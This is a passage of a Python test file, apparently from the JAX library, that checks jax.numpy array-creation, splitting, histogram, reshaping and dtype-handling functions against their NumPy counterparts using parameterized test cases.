    for shape in [(), (2,), (3, 4), (1, 100), (2, 3, 4)]
    for array_input in [True, False]))
def testHVDStack(self, shape, op, dtypes, array_input):
  """Check jnp.hstack/vstack/dstack against numpy for mixed-dtype inputs."""
  rng = jtu.rand_default(self.rng())
  if array_input:
    args_maker = lambda: [np.array([rng(shape, dtype) for dtype in dtypes])]
  else:
    args_maker = lambda: [[rng(shape, dtype) for dtype in dtypes]]
  np_fun = _promote_like_jnp(getattr(np, op))
  jnp_fun = getattr(jnp, op)
  # numpy reference comes first: _CheckAgainstNumpy(numpy_reference_op,
  # lax_op, ...), consistent with every other call in this file.
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_inshape={}_outdtype={}_fillshape={}".format(
        jtu.format_shape_dtype_string(shape, fill_value_dtype),
        np.dtype(out_dtype).name if out_dtype else "None",
        fill_value_shape),
     "fill_value_dtype": fill_value_dtype, "fill_value_shape": fill_value_shape,
     "shape": shape, "out_dtype": out_dtype}
    for shape in array_shapes + [3, np.array(7, dtype=np.int32)]
    for fill_value_dtype in default_dtypes
    for fill_value_shape in _compatible_shapes(shape)
    for out_dtype in [None] + default_dtypes))
def testFull(self, shape, fill_value_dtype, fill_value_shape, out_dtype):
  """jnp.full agrees with np.full for scalar and broadcastable fill values."""
  rng = jtu.rand_default(self.rng())
  # Bind shape and dtype; the fill value is supplied by args_maker.
  np_fun = partial(np.full, shape, dtype=out_dtype)
  jnp_fun = partial(jnp.full, shape, dtype=out_dtype)
  args_maker = lambda: [rng(fill_value_shape, fill_value_dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.named_cases_from_sampler(lambda s: ({
"testcase_name": "_shape={}_n={}_axis={}_prepend={}_append={}".format(
jtu.format_shape_dtype_string(shape, dtype),
n, axis, prepend, append),
"shape": shape, "dtype": dtype, "n": n, "axis": axis,
"prepend": prepend, "append": append
} for shape, dtype in s(_shape_and_dtypes(nonempty_nonscalar_array_shapes, default_dtypes))
for n in s([0, 1, 2])
for axis in s(list(range(-len(shape), max(1, len(shape)))))
for prepend in s([None, 1, np.zeros(shape, dtype=dtype)])
for append in s([None, 1, np.zeros(shape, dtype=dtype)])
)))
def testDiff(self, shape, dtype, n, axis, prepend, append):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
def np_fun(x, n=n, axis=axis, prepend=prepend, append=append):
if prepend is None:
prepend = np._NoValue
elif not np.isscalar(prepend) and prepend.dtype == jnp.bfloat16:
prepend = prepend.astype(np.float32)
if append is None:
append = np._NoValue
elif not np.isscalar(append) and append.dtype == jnp.bfloat16:
append = append.astype(np.float32)
if x.dtype == jnp.bfloat16:
return np.diff(x.astype(np.float32), n=n, axis=axis, prepend=prepend, append=append).astype(jnp.bfloat16)
else:
return np.diff(x, n=n, axis=axis, prepend=prepend, append=append)
jnp_fun = lambda x: jnp.diff(x, n=n, axis=axis, prepend=prepend, append=append)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(
    jtu.cases_from_list(
        {"testcase_name": ("_op={}_shape={}_dtype={}").format(op, shape, dtype),
         "np_op": getattr(np, op), "jnp_op": getattr(jnp, op),
         "shape": shape, "dtype": dtype}
        for op in ["zeros", "ones"]
        for shape in [2, (), (2,), (3, 0), np.array((4, 5, 6), dtype=np.int32),
                      np.array(4, dtype=np.int32)]
        for dtype in all_dtypes))
def testZerosOnes(self, np_op, jnp_op, shape, dtype):
  """jnp.zeros/jnp.ones agree with numpy for int, tuple, and ndarray shapes."""
  np_fun = lambda: np_op(shape, dtype)
  jnp_fun = lambda: jnp_op(shape, dtype)
  args_maker = list  # nullary: shape and dtype are already bound above
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
def testOnesWithInvalidShape(self):
  """jnp.ones must raise TypeError for a negative dimension."""
  with self.assertRaises(TypeError):
    jnp.ones((-1, 1))
@parameterized.named_parameters(jtu.named_cases_from_sampler(lambda s: ({
"testcase_name": "_inshape={}_filldtype={}_fillshape={}_outdtype={}_outshape={}".format(
jtu.format_shape_dtype_string(shape, in_dtype),
np.dtype(fill_value_dtype).name, fill_value_shape,
np.dtype(out_dtype).name, out_shape),
"shape": shape, "in_dtype": in_dtype,
"fill_value_dtype": fill_value_dtype, "fill_value_shape": fill_value_shape,
"out_dtype": out_dtype, "out_shape": out_shape
} for shape in s(array_shapes)
for out_shape in s([None] + array_shapes)
for in_dtype in s(default_dtypes)
for fill_value_dtype in s(default_dtypes)
for fill_value_shape in s(_compatible_shapes(shape if out_shape is None else out_shape))
for out_dtype in s(default_dtypes))))
def testFullLike(self, shape, in_dtype, fill_value_dtype, fill_value_shape, out_dtype, out_shape):
if numpy_version < (1, 19) and out_shape == ():
raise SkipTest("Numpy < 1.19 treats out_shape=() like out_shape=None")
rng = jtu.rand_default(self.rng())
np_fun = lambda x, fill_value: np.full_like(
x, fill_value, dtype=out_dtype, shape=out_shape)
jnp_fun = lambda x, fill_value: jnp.full_like(
x, fill_value, dtype=out_dtype, shape=out_shape)
args_maker = lambda: [rng(shape, in_dtype), rng(fill_value_shape, fill_value_dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_func={}_inshape={}_outshape={}_outdtype={}".format(
        func, jtu.format_shape_dtype_string(shape, in_dtype),
        out_shape, out_dtype),
     "func": func, "shape": shape, "in_dtype": in_dtype,
     "out_shape": out_shape, "out_dtype": out_dtype}
    for shape in array_shapes
    for out_shape in [None] + array_shapes
    for in_dtype in default_dtypes
    for func in ["ones_like", "zeros_like"]
    for out_dtype in default_dtypes))
def testZerosOnesLike(self, func, shape, in_dtype, out_shape, out_dtype):
  """jnp.ones_like/zeros_like agree with numpy, incl. dtype/shape overrides."""
  if numpy_version < (1, 19) and out_shape == ():
    raise SkipTest("Numpy < 1.19 treats out_shape=() like out_shape=None")
  rng = jtu.rand_default(self.rng())
  np_fun = partial(getattr(np, func), dtype=out_dtype, shape=out_shape)
  jnp_fun = partial(getattr(jnp, func), dtype=out_dtype, shape=out_shape)
  args_maker = lambda: [rng(shape, in_dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_func={}_inshape={}_weak_type={}_outshape={}_outdtype={}".format(
        func, jtu.format_shape_dtype_string(shape, in_dtype),
        weak_type, out_shape, out_dtype),
     "func": func, "args": args,
     "shape": shape, "in_dtype": in_dtype, "weak_type": weak_type,
     "out_shape": out_shape, "out_dtype": out_dtype}
    for shape in array_shapes
    for in_dtype in [np.int32, np.float32, np.complex64]
    for weak_type in [True, False]
    for out_shape in [None, (), (10,)]
    for func, args in [("full_like", (-100,)), ("ones_like", ()), ("zeros_like", ())]
    for out_dtype in [None, float]))
def testZerosOnesFullLikeWeakType(self, func, args, shape, in_dtype, weak_type, out_shape, out_dtype):
  """full_like/ones_like/zeros_like preserve the input's weak type exactly
  when no explicit dtype is requested."""
  if numpy_version < (1, 19) and out_shape == ():
    raise SkipTest("Numpy < 1.19 treats out_shape=() like out_shape=None")
  rng = jtu.rand_default(self.rng())
  x = lax._convert_element_type(rng(shape, in_dtype), weak_type=weak_type)
  fun = lambda x: getattr(jnp, func)(x, *args, dtype=out_dtype, shape=out_shape)
  # Weak typing survives only if the input was weak AND no dtype was given.
  expected_weak_type = weak_type and (out_dtype is None)
  self.assertEqual(dtypes.is_weakly_typed(fun(x)), expected_weak_type)
  self.assertEqual(dtypes.is_weakly_typed(api.jit(fun)(x)), expected_weak_type)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_funcname={}_input_type={}_val={}_dtype={}".format(
        funcname, input_type, val, dtype),
     "funcname": funcname, "input_type": input_type, "val": val, "dtype": dtype}
    for funcname in ["array", "asarray"]
    for dtype in [int, float, None]
    for val in [0, 1]
    for input_type in [int, float, np.int32, np.float32]))
def testArrayWeakType(self, funcname, input_type, val, dtype):
  """jnp.array/asarray yield a weak type exactly when no dtype is given and
  the input is a Python weak-typed scalar — under both eager and jit."""
  op = getattr(jnp, funcname)
  convert = lambda x: op(x, dtype=dtype)
  convert_jit = api.jit(convert)
  value = input_type(val)
  expect_weak = dtype is None and input_type in set(dtypes._weak_types)
  self.assertEqual(dtypes.is_weakly_typed(convert(value)), expect_weak)
  self.assertEqual(dtypes.is_weakly_typed(convert_jit(value)), expect_weak)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_weak_type={}_slc={}".format(
        jtu.format_shape_dtype_string(shape, dtype), weak_type, slc),
     "shape": shape, "dtype": dtype, "weak_type": weak_type, "slc": slc}
    for shape in nonempty_nonscalar_array_shapes
    for dtype in [int, float, complex]
    for weak_type in [True, False]
    for slc in [slice(None), slice(0), slice(3), 0, ...]))
def testSliceWeakTypes(self, shape, dtype, weak_type, slc):
  """Indexing/slicing preserves the operand's weak type, eager and jitted."""
  rng = jtu.rand_default(self.rng())
  x = lax._convert_element_type(rng(shape, dtype), weak_type=weak_type)
  op = lambda x: x[slc]
  self.assertEqual(op(x).aval.weak_type, weak_type)
  self.assertEqual(api.jit(op)(x).aval.weak_type, weak_type)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_{}sections".format(
        jtu.format_shape_dtype_string(shape, dtype), axis, num_sections),
     "shape": shape, "num_sections": num_sections, "axis": axis,
     "dtype": dtype}
    for shape, axis, num_sections in [
      ((3,), 0, 3), ((12,), 0, 3), ((12, 4), 0, 4), ((12, 4), 1, 2),
      ((2, 3, 4), -1, 2), ((2, 3, 4), -2, 3)]
    for dtype in default_dtypes))
def testSplitStaticInt(self, shape, num_sections, axis, dtype):
  """jnp.split agrees with np.split when the sections divide the axis evenly."""
  rng = jtu.rand_default(self.rng())
  def np_fun(x):
    return np.split(x, num_sections, axis=axis)
  def jnp_fun(x):
    return jnp.split(x, num_sections, axis=axis)
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_{}sections".format(
        jtu.format_shape_dtype_string(shape, dtype), axis, num_sections),
     "shape": shape, "num_sections": num_sections, "axis": axis, "dtype": dtype}
    # All testcases split the specified axis unequally
    for shape, axis, num_sections in [
      ((3,), 0, 2), ((12,), 0, 5), ((12, 4), 0, 7), ((12, 4), 1, 3),
      ((2, 3, 5), -1, 2), ((2, 4, 4), -2, 3), ((7, 2, 2), 0, 3)]
    for dtype in default_dtypes))
def testArraySplitStaticInt(self, shape, num_sections, axis, dtype):
  """jnp.array_split agrees with np.array_split on uneven splits."""
  rng = jtu.rand_default(self.rng())
  def np_fun(x):
    return np.array_split(x, num_sections, axis=axis)
  def jnp_fun(x):
    return jnp.array_split(x, num_sections, axis=axis)
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
def testSplitTypeError(self):
  """jnp.split must reject abstract tracers as split indices but accept
  concrete arrays and concrete (jvp) tracers."""
  # If we pass an ndarray for indices_or_sections -> no error
  self.assertEqual(3, len(jnp.split(jnp.zeros(3), jnp.array([1, 2]))))

  CONCRETIZATION_MSG = "Abstract tracer value encountered where concrete value is expected."
  with self.assertRaisesRegex(TypeError, CONCRETIZATION_MSG):
    # An abstract tracer for idx
    api.jit(lambda idx: jnp.split(jnp.zeros((12, 2)), idx))(2.)
  with self.assertRaisesRegex(TypeError, CONCRETIZATION_MSG):
    # A list including an abstract tracer
    api.jit(lambda idx: jnp.split(jnp.zeros((12, 2)), [2, idx]))(2.)

  # A concrete tracer -> no error
  api.jvp(lambda idx: jnp.split(jnp.zeros((12, 2)), idx),
          (2.,), (1.,))
  # A tuple including a concrete tracer -> no error
  api.jvp(lambda idx: jnp.split(jnp.zeros((12, 2)), (1, idx)),
          (2.,), (1.,))
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_bins={}_range={}_weights={}".format(
        jtu.format_shape_dtype_string(shape, dtype), bins, range, weights),
     "shape": shape,
     "dtype": dtype,
     "bins": bins,
     "range": range,
     "weights": weights,
    }
    for shape in [(5,), (5, 5)]
    for dtype in number_dtypes
    for bins in [10, np.arange(-5, 6), [-5, 0, 3]]
    for range in [None, (0, 0), (0, 10)]
    for weights in [True, False]
    ))
def testHistogramBinEdges(self, shape, dtype, bins, range, weights):
  """Check jnp.histogram_bin_edges against numpy over bin specs and ranges."""
  rng = jtu.rand_default(self.rng())
  # weights=False passes None so the unweighted code path is also covered.
  _weights = lambda w: abs(w) if weights else None
  np_fun = lambda a, w, r: np.histogram_bin_edges(a, bins=bins, range=r,
                                                  weights=_weights(w))
  jnp_fun = lambda a, w, r: jnp.histogram_bin_edges(a, bins=bins, range=r,
                                                    weights=_weights(w))
  args_maker = lambda: [rng(shape, dtype), rng(shape, dtype), range]
  tol = {jnp.bfloat16: 2E-2, np.float16: 1E-2}
  # linspace() compares poorly to numpy when using bfloat16
  if dtype != jnp.bfloat16:
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False, tol=tol)
  self._CompileAndCheck(jnp_fun, args_maker,
                        atol=tol, rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_bins={}_density={}_weights={}".format(
        jtu.format_shape_dtype_string(shape, dtype), bins, density, weights),
     "shape": shape,
     "dtype": dtype,
     "bins": bins,
     "density": density,
     "weights": weights,
    }
    for shape in [(5,), (5, 5)]
    for dtype in default_dtypes
    # We only test explicit integer-valued bin edges because in other cases
    # rounding errors lead to flaky tests.
    for bins in [np.arange(-5, 6), [-5, 0, 3]]
    for density in [True, False]
    for weights in [True, False]
))
def testHistogram(self, shape, dtype, bins, density, weights):
  """Checks jnp.histogram against np.histogram with/without density & weights."""
  rng = jtu.rand_default(self.rng())
  # weights are made non-negative (abs) when used, or omitted entirely.
  _weights = lambda w: abs(w) if weights else None
  np_fun = lambda a, w: np.histogram(a, bins=bins, density=density,
                                     weights=_weights(w))
  jnp_fun = lambda a, w: jnp.histogram(a, bins=bins, density=density,
                                       weights=_weights(w))
  args_maker = lambda: [rng(shape, dtype), rng(shape, dtype)]
  tol = {jnp.bfloat16: 2E-2, np.float16: 1E-1}
  # np.searchsorted errors on bfloat16 with
  # "TypeError: invalid type promotion with custom data type"
  if dtype != jnp.bfloat16:
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
                            tol=tol)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_bins={}_weights={}_density={}".format(
        jtu.format_shape_dtype_string(shape, dtype), bins, weights, density),
     "shape": shape,
     "dtype": dtype,
     "bins": bins,
     "weights": weights,
     "density": density
    }
    for shape in [(5,), (12,)]
    for dtype in int_dtypes
    for bins in [2, [2, 2], [[0, 1, 3, 5], [0, 2, 3, 4, 6]]]
    for weights in [False, True]
    for density in [False, True]
))
def testHistogram2d(self, shape, dtype, bins, weights, density):
  """Checks jnp.histogram2d against np.histogram2d."""
  rng = jtu.rand_default(self.rng())
  # weights are made non-negative (abs) when used, or omitted entirely.
  _weights = lambda w: abs(w) if weights else None
  np_fun = lambda a, b, w: np.histogram2d(a, b, bins=bins, weights=_weights(w), density=density)
  jnp_fun = lambda a, b, w: jnp.histogram2d(a, b, bins=bins, weights=_weights(w), density=density)
  args_maker = lambda: [rng(shape, dtype), rng(shape, dtype), rng(shape, dtype)]
  tol = {jnp.bfloat16: 2E-2, np.float16: 1E-1}
  # np.searchsorted errors on bfloat16 with
  # "TypeError: invalid type promotion with custom data type"
  # density normalization can divide by zero; silence numpy's warnings.
  with np.errstate(divide='ignore', invalid='ignore'):
    if dtype != jnp.bfloat16:
      self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
                              tol=tol)
    self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_bins={}_weights={}_density={}".format(
        jtu.format_shape_dtype_string(shape, dtype), bins, weights, density),
     "shape": shape,
     "dtype": dtype,
     "bins": bins,
     "weights": weights,
     "density": density
    }
    for shape in [(5, 3), (10, 3)]
    for dtype in int_dtypes
    for bins in [(2, 2, 2), [[-5, 0, 4], [-4, -1, 2], [-6, -1, 4]]]
    for weights in [False, True]
    for density in [False, True]
))
def testHistogramdd(self, shape, dtype, bins, weights, density):
  """Checks jnp.histogramdd against np.histogramdd."""
  rng = jtu.rand_default(self.rng())
  # weights are per-sample: one weight per row of the (N, D) sample array.
  _weights = lambda w: abs(w) if weights else None
  np_fun = lambda a, w: np.histogramdd(a, bins=bins, weights=_weights(w), density=density)
  jnp_fun = lambda a, w: jnp.histogramdd(a, bins=bins, weights=_weights(w), density=density)
  args_maker = lambda: [rng(shape, dtype), rng((shape[0],), dtype)]
  tol = {jnp.bfloat16: 2E-2, np.float16: 1E-1}
  # np.searchsorted errors on bfloat16 with
  # "TypeError: invalid type promotion with custom data type"
  if dtype != jnp.bfloat16:
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
                            tol=tol)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_{}sections".format(
        jtu.format_shape_dtype_string(shape, dtype), axis, num_sections),
     "shape": shape, "num_sections": num_sections, "axis": axis,
     "dtype": dtype}
    for shape, axis, num_sections in [
        ((12, 4), 0, 4), ((12, 4), 1, 2),
        ((2, 3, 4), 2, 2), ((4, 3, 4), 0, 2)]
    for dtype in default_dtypes))
def testHVDSplit(self, shape, num_sections, axis, dtype):
  """Checks jnp.vsplit/hsplit/dsplit against their numpy counterparts."""
  rng = jtu.rand_default(self.rng())
  def fn(module, axis):
    # Map the split axis to the corresponding convenience function.
    if axis == 0:
      return module.vsplit
    elif axis == 1:
      return module.hsplit
    else:
      assert axis == 2
      return module.dsplit

  np_fun = lambda x: fn(np, axis)(x, num_sections)
  jnp_fun = lambda x: fn(jnp, axis)(x, num_sections)
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_inshape={}_outshape={}_order={}".format(
        jtu.format_shape_dtype_string(arg_shape, dtype),
        jtu.format_shape_dtype_string(out_shape, dtype),
        order),
     "arg_shape": arg_shape, "out_shape": out_shape, "dtype": dtype,
     "order": order}
    for dtype in default_dtypes
    for order in ["C", "F"]
    for arg_shape, out_shape in [
        (jtu.NUMPY_SCALAR_SHAPE, (1, 1, 1)),
        ((), (1, 1, 1)),
        ((7, 0), (0, 42, 101)),
        ((3, 4), 12),        # scalar newshape
        ((3, 4), (12,)),
        ((3, 4), -1),        # inferred dimension as a scalar
        ((2, 1, 4), (-1,)),  # inferred dimension in a tuple
        ((2, 2, 4), (2, 8))
    ]))
def testReshape(self, arg_shape, out_shape, dtype, order):
  """Checks jnp.reshape against np.reshape for C and Fortran orders."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda x: np.reshape(x, out_shape, order=order)
  jnp_fun = lambda x: jnp.reshape(x, out_shape, order=order)
  args_maker = lambda: [rng(arg_shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_inshape={}_outshape={}".format(
        jtu.format_shape_dtype_string(arg_shape, dtype),
        jtu.format_shape_dtype_string(out_shape, dtype)),
     "arg_shape": arg_shape, "out_shape": out_shape, "dtype": dtype}
    for dtype in default_dtypes
    for arg_shape, out_shape in [
        ((7, 0), (0, 42, 101)),
        ((2, 1, 4), (-1,)),
        ((2, 2, 4), (2, 8))
    ]))
def testReshapeMethod(self, arg_shape, out_shape, dtype):
  """Checks the .reshape() method with unpacked (varargs) shape arguments."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda x: np.reshape(x, out_shape)
  # Note: dims passed positionally (x.reshape(*dims)) rather than as a tuple.
  jnp_fun = lambda x: x.reshape(*out_shape)
  args_maker = lambda: [rng(arg_shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_inshape={}_outshape={}".format(
        jtu.format_shape_dtype_string(arg_shape, dtype),
        jtu.format_shape_dtype_string(out_shape, dtype)),
     "arg_shape": arg_shape, "out_shape": out_shape, "dtype": dtype}
    for dtype in default_dtypes
    for arg_shape, out_shape in itertools.product(all_shapes, array_shapes)))
def testResize(self, arg_shape, out_shape, dtype):
  """Checks jnp.resize against np.resize."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda x: np.resize(x, out_shape)
  jnp_fun = lambda x: jnp.resize(x, out_shape)
  args_maker = lambda: [rng(arg_shape, dtype)]
  # Empty out_shape only matches numpy behavior from version 1.20 on.
  if len(out_shape) > 0 or numpy_version >= (1, 20, 0):
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_inshape={}_expanddim={!r}".format(
        jtu.format_shape_dtype_string(arg_shape, dtype), dim),
     "arg_shape": arg_shape, "dtype": dtype, "dim": dim}
    for arg_shape in [(), (3,), (3, 4)]
    for dtype in default_dtypes
    # dim cases cover ints, np scalars, tuples, lists, and multi-axis tuples.
    for dim in (list(range(-len(arg_shape)+1, len(arg_shape)))
                + [np.array(0), np.array(-1), (0,), [np.array(0)],
                   (len(arg_shape), len(arg_shape) + 1)])))
def testExpandDimsStaticDim(self, arg_shape, dtype, dim):
  """Checks jnp.expand_dims against np.expand_dims for static axis values."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda x: np.expand_dims(x, dim)
  jnp_fun = lambda x: jnp.expand_dims(x, dim)
  args_maker = lambda: [rng(arg_shape, dtype)]
  self._CompileAndCheck(jnp_fun, args_maker)
  # numpy gained multi-axis expand_dims only in 1.18.
  if isinstance(dim, (tuple, list)) and numpy_version < (1, 18, 0):
    raise SkipTest("support for multiple axes added in NumPy 1.18.0")
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_inshape={}_axes=({},{})".format(
        jtu.format_shape_dtype_string(arg_shape, dtype), ax1, ax2),
     "arg_shape": arg_shape, "dtype": dtype, "ax1": ax1, "ax2": ax2}
    for arg_shape, ax1, ax2 in [
        ((3, 4), 0, 1), ((3, 4), 1, 0), ((3, 4, 5), 1, 2),
        ((3, 4, 5), -1, -2), ((3, 4, 5), 0, 1)]
    for dtype in default_dtypes))
def testSwapAxesStaticAxes(self, arg_shape, dtype, ax1, ax2):
  """Checks jnp.swapaxes against np.swapaxes for static axis values."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda x: np.swapaxes(x, ax1, ax2)
  jnp_fun = lambda x: jnp.swapaxes(x, ax1, ax2)
  args_maker = lambda: [rng(arg_shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_inshape={}_axis={!r}".format(
        jtu.format_shape_dtype_string(arg_shape, dtype), ax),
     "arg_shape": arg_shape, "dtype": dtype, "ax": ax}
    # axis cases cover None, ints, negative ints, np scalars, and tuples.
    for arg_shape, ax in [
        ((3, 1), None),
        ((3, 1), 1),
        ((3, 1), -1),
        ((3, 1), np.array(1)),
        ((1, 3, 1), (0, 2)),
        ((1, 3, 1), (0,)),
        ((1, 4, 1), (np.array(0),))]
    for dtype in default_dtypes))
def testSqueeze(self, arg_shape, dtype, ax):
  """Checks jnp.squeeze against np.squeeze."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda x: np.squeeze(x, ax)
  jnp_fun = lambda x: jnp.squeeze(x, ax)
  args_maker = lambda: [rng(arg_shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_axis={}_weights={}_returned={}".format(
        jtu.format_shape_dtype_string(shape, dtype),
        axis,
        (None if weights_shape is None else jtu.format_shape_dtype_string(weights_shape, dtype)),
        returned),
     "shape": shape, "dtype": dtype, "axis": axis,
     "weights_shape": weights_shape, "returned": returned}
    for shape, dtype in _shape_and_dtypes(nonempty_shapes, number_dtypes)
    for axis in list(range(-len(shape), len(shape))) + [None]
    # `weights_shape` is either `None`, same as the averaged axis, or same as
    # that of the input
    for weights_shape in ([None, shape] if axis is None or len(shape) == 1
                          else [None, (shape[axis],), shape])
    for returned in [False, True]))
def testAverage(self, shape, dtype, axis, weights_shape, returned):
  """Checks jnp.average against np.average, with and without weights."""
  rng = jtu.rand_default(self.rng())
  if weights_shape is None:
    np_fun = lambda x: np.average(x, axis, returned=returned)
    jnp_fun = lambda x: jnp.average(x, axis, returned=returned)
    args_maker = lambda: [rng(shape, dtype)]
  else:
    np_fun = lambda x, weights: np.average(x, axis, weights, returned)
    jnp_fun = lambda x, weights: jnp.average(x, axis, weights, returned)
    args_maker = lambda: [rng(shape, dtype), rng(weights_shape, dtype)]
  # Promote numpy inputs to match jnp's inexact promotion semantics.
  np_fun = _promote_like_jnp(np_fun, inexact=True)
  tol = {dtypes.bfloat16: 2e-1, np.float16: 1e-2, np.float32: 1e-5,
         np.float64: 1e-12, np.complex64: 1e-5}
  check_dtypes = shape is not jtu.PYTHON_SCALAR_SHAPE
  try:
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                            check_dtypes=check_dtypes, tol=tol)
  except ZeroDivisionError:
    # np.average raises ZeroDivisionError when the weights sum to zero.
    self.skipTest("don't support checking for ZeroDivisionError")
  self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=check_dtypes,
                        rtol=tol, atol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name":
       f"_arg{i}_ndmin={ndmin}_dtype={np.dtype(dtype) if dtype else None}",
     "arg": arg, "ndmin": ndmin, "dtype": dtype}
    for i, (arg, dtypes) in enumerate([
        ([True, False, True], all_dtypes),
        (3., all_dtypes),
        ([1, 2, 3], all_dtypes),
        (np.array([1, 2, 3], dtype=np.int64), all_dtypes),
        ([1., 2., 3.], all_dtypes),
        ([[1, 2], [3, 4], [5, 6]], all_dtypes),
        ([[1, 2.], [3, 4], [5, 6]], all_dtypes),
        ([[1., 2j], [3., 4.], [5., 6.]], complex_dtypes),
        ([[3, np.array(2, dtype=jnp.float_), 1],
          np.arange(3., dtype=jnp.float_)], all_dtypes),
    ])
    for dtype in [None] + dtypes
    for ndmin in [None, np.ndim(arg), np.ndim(arg) + 1, np.ndim(arg) + 2]))
def testArray(self, arg, ndmin, dtype):
  """Checks jnp.array against np.array for dtype and ndmin handling."""
  args_maker = lambda: [arg]
  # np.array gets the canonicalized dtype so results are comparable even
  # when x64 is disabled.
  canonical_dtype = dtypes.canonicalize_dtype(dtype or np.array(arg).dtype)
  if ndmin is not None:
    np_fun = partial(np.array, ndmin=ndmin, dtype=canonical_dtype)
    jnp_fun = partial(jnp.array, ndmin=ndmin, dtype=dtype)
  else:
    np_fun = partial(np.array, dtype=canonical_dtype)
    jnp_fun = partial(jnp.array, dtype=dtype)

  # We are testing correct canonicalization behavior here, so we turn off the
  # permissive canonicalization logic in the test harness.
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                          canonicalize_dtypes=False)
  self._CompileAndCheck(jnp_fun, args_maker)
def testArrayUnsupportedDtypeError(self):
  """A structured (record) dtype is rejected by jnp.array with a TypeError."""
  structured_dtype = [('a', '<i4'), ('b', '<i4')]
  with self.assertRaisesRegex(TypeError,
                              "JAX only supports number and bool dtypes.*"):
    jnp.array(3, structured_dtype)
def testArrayFromInteger(self):
  """Python ints convert to the canonical int dtype; overflow raises."""
  int_dtype = dtypes.canonicalize_dtype(jnp.int64)
  info = jnp.iinfo(int_dtype)

  # Values at extremes are converted correctly.
  for val in (info.min, 0, info.max):
    self.assertEqual(jnp.array(val).dtype, int_dtype)

  # One past the maximum leads to an OverflowError.
  val = info.max + 1
  msg = f"Python int {val} too large to convert to {int_dtype.name}"
  with self.assertRaisesRegex(OverflowError, msg):
    jnp.array(val)

  # An explicit uint64 dtype should still accept the value when x64 is on.
  if config.x64_enabled:
    self.assertEqual(np.uint64(val), jnp.array(val, dtype='uint64'))
# TODO(jakevdp): fix list inputs to jnp.array and enable the following test
# def testArrayFromList(self):
# int_max = jnp.iinfo(jnp.int64).max
# int_min = jnp.iinfo(jnp.int64).min
#
# # Values at extremes are converted correctly.
# for val in [int_min, 0, int_max]:
# self.assertEqual(jnp.array([val]).dtype, dtypes.canonicalize_dtype('int64'))
#
# # list of values results in promoted type.
